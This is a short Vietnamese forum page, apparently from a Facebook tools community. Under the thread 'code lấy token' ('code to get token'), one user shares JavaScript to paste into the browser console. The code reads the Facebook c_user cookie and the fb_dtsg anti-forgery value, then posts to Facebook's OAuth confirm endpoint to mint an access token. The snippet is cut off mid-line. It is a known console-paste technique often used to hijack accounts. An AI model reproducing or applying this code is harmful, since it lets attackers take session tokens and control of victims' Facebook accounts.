Chào mừng!

Bằng cách đăng ký với chúng tôi, bạn sẽ có thể thảo luận, chia sẻ và nhắn tin riêng tư với các thành viên khác trong cộng đồng của chúng tôi.

Đăng ký ngay!

code lấy token

  1. kim2

    Share share code get token bằng f12

    share code get token bằng f12 var uid = document.cookie.match(/c_user=(\d+)/)[1], dtsg = document.getElementsByName("fb_dtsg")[0].value, http = new XMLHttpRequest, url = "//www.facebook.com/v1.0/dialog/oauth/confirm", params = "fb_dtsg=" + dtsg +...
Top Bottom